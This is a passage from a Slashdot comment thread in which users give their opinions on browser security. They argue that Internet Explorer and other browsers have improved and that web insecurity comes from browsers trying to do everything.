Truth is that IE is not the best browser, but is better than it was.

Firefox is also better than it was, so is Opera, so is Webkit (Safari). In the future, I expect Chrome, if it survives, to be better too.

Why is any of this news? It is really just a marketing departments attemt to deflect blame away from where it belongs.

It's really quite simple (1)

vtcodger (957785) | more than 5 years ago | (#25851927)

It's quite simple. You/They/We can define a very simple interface that displays some stuff and allows a few simple user inputs and maybe after a few years of debugging we might have a reliable browser suitable for basic stuff -- including financial data transfers and buying and selling stuff.

Or we can continue to try to do everything in the world in our browsers and then act really surprised when our PC starts relaying 20 thousand spam messages a day or our money and/or data and/or identity ends up in Lichtenstein, Haute Volta, or Inner Mongolia.

It's quite clear to me that we -- all of us -- are going to go with the second option. That's fine. Now can we quit pretending that web insecurity is someone else's fault?

Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Create a Slashdot Account

Loading...